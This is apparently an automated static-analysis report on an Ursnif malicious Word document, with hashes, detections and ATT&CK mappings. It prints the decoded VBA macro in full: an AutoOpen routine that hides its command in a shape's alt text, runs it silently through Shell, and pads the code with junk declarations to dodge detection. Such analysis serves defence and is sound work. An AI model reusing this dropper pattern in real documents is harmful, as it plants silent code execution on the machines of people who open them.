Ursnif — Office (OLE) malware analysis

Static analysis result for SHA-256 1f4d350cb3a6542b…

MALICIOUS

Office (OLE)

Size: 74.0 KB
Created: 2018-04-19 18:59:00
Authoring application: Microsoft Office Word
First seen: 2019-03-10
MD5: 3f7560ff6f0507b3f16fbf6e5f727348
SHA-1: 1dbdf1f238573f641b691ef2c9c0f63e2e3a645b
SHA-256: 1f4d350cb3a6542b9a74431276554c484e80089f4c263f1d4456c88aa8942641
Risk score: 202

Malware Insights

Ursnif · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1203 Exploitation for Client Execution

ClamAV identifies the sample as malicious with the signature 'Doc.Dropper.Ursnif-6864686-0', indicating a known Ursnif variant. The VBA project contains a critical Shell() call that is reached directly from the AutoOpen procedure, so a command is executed as soon as the document is opened with macros enabled. The command string itself does not appear in the macro source: the function zwyvagaquv() returns a document Shape looked up by name ('szupocaru'), and AutoOpen passes that shape's AlternativeText property to Interaction.Shell$ with the vbHide window style, so the payload lives in the document body rather than in the macro and runs without a visible window. The many Dim declarations and Integer additions surrounding these lines are filler whose results are never used, a routine obfuscation pattern meant to dilute signature and heuristic matching. This functionality is typical of droppers that download and execute further malicious stages.

Heuristics (6)

  • ClamAV: Doc.Dropper.Ursnif-6864686-0 | severity: critical | CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Ursnif-6864686-0
  • VBA macros detected | severity: medium | 2 related findings | OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA | severity: critical | OLE_VBA_SHELL
  • AutoOpen macro | severity: high | OLE_VBA_AUTOOPEN
  • Legacy WordBasic auto-exec macro marker | severity: medium | OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL | severity: info | EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename   | Kind      | Source                                                  | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source)     | 3412 bytes
SHA-256: 243b68023a1832a04cc334973c6dde46ce7b33ed2a87ac5b1029254f28367f4b
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "wjohoty"
Function zwyvagaquv()


Dim uxqutZXf As Integer

Dim nZOCxMfS As Long

uxqutZXf = 6438 + 5413

Dim pDAeeV As Integer

Dim MpljD As Long

pDAeeV = 3969 + 2089

Dim RIhth As Integer
Dim rwemiwowy As Long
RIhth = 6519 + 6069

Dim bSxkMShz As Integer

Dim pGxsV As Long

bSxkMShz = 2305 + 2860

Dim XjfzK As Integer

Dim qmygali As Long

XjfzK = 6881 + 6590

Dim htih As Integer
Dim RGxJvC As Long
htih = 9303 + 8776

Dim nczHY As Integer

Dim KiMNQO As Long

nczHY = 5269 + 2935

Dim qfija As Integer

Dim dwocan As Long

qfija = 4668 + 5466

Dim gfebekito As Integer
Dim kgatyqud As Long
gfebekito = 9269 + 8141

bjov = "szupocaru"


Dim xtyqubolik As Integer

Dim pgic As Long

xtyqubolik = 6999 + 1620

Dim djehugo As Integer

Dim bgiq As Long

djehugo = 1631 + 7990

Dim vvanawozy As Integer
Dim rtawac As Long
vvanawozy = 7213 + 4709

Dim vropefusebu As Integer

Dim ckubiwup As Long

vropefusebu = 2357 + 9097

Dim gresowu As Integer

Dim CdrjUMB As Long

gresowu = 9046 + 6312

Dim mfusakabu As Integer
Dim WlvNjhN As Long
mfusakabu = 3437 + 6494

Dim bpuzozexi As Integer

Dim sdajipami As Long

bpuzozexi = 1801 + 2179

Dim pDARX As Integer

Dim JIlHSk As Long

pDARX = 4720 + 2534

Dim WUDSMM As Integer
Dim oODqIrs As Long
WUDSMM = 4775 + 3528

Set zwyvagaquv = ActiveDocument.Shapes(bjov)


End Function
Sub AutoOpen()


Dim BBqkrlf As Integer

Dim qjum As Long

BBqkrlf = 5417 + 4007

Dim zfivyxapa As Integer

Dim gquhirisy As Long

zfivyxapa = 1788 + 8559

Dim EFlZfrao As Integer
Dim qhuc As Long
EFlZfrao = 6599 + 4483

Dim vkemukezoq As Integer

Dim nmxVsYpH As Long

vkemukezoq = 7385 + 9310

Dim FlhJu As Integer

Dim qloxyc As Long

FlhJu = 3537 + 4109

Dim fgiqonimofe As Integer
Dim ssucawejeje As Long
fgiqonimofe = 8650 + 9316

Set msynirepy = zwyvagaquv


Dim gwewetohy As Integer

Dim AHkGoQhV As Long

gwewetohy = 5921 + 7747

Dim cyyhCEuv As Integer

Dim TUedbL As Long

cyyhCEuv = 6535 + 5152

Dim wcuduhutywe As Integer
Dim RzRFdLiY As Long
wcuduhutywe = 6911 + 7826

Interaction.Shell$ _
msynirepy.AlternativeText, vbHide


Dim QLQew As Integer

Dim wtymo As Long

QLQew = 4456 + 7847

Dim rsysutemefa As Integer

Dim jqecu As Long

rsysutemefa = 5838 + 1792

Dim QjjBof As Integer
Dim gXLJPRxC As Long
QjjBof = 7786 + 1883

Dim gYtWMi As Integer

Dim YfxmXGV As Long

gYtWMi = 6712 + 5707

Dim lcXeA As Integer

Dim sbaqel As Long

lcXeA = 7895 + 8340

Dim nnuxowon As Integer
Dim xbapadivuvi As Long
nnuxowon = 2233 + 1810

Dim rpAoR As Integer

Dim oUDtZyCg As Long

rpAoR = 5602 + 6312

Dim zhyxu As Integer

Dim ctan As Long

zhyxu = 7212 + 8242

Dim rkuruvy As Integer
Dim smysisug As Long
rkuruvy = 3954 + 1328

Dim afhpipk As Integer

Dim hkycy As Long

afhpipk = 3887 + 5835

Dim wtapasel As Integer

Dim vJhHxdS As Long

wtapasel = 6006 + 8804

Dim hxopotu As Integer
Dim ZNzpSv As Long
hxopotu = 8870 + 2018

End Sub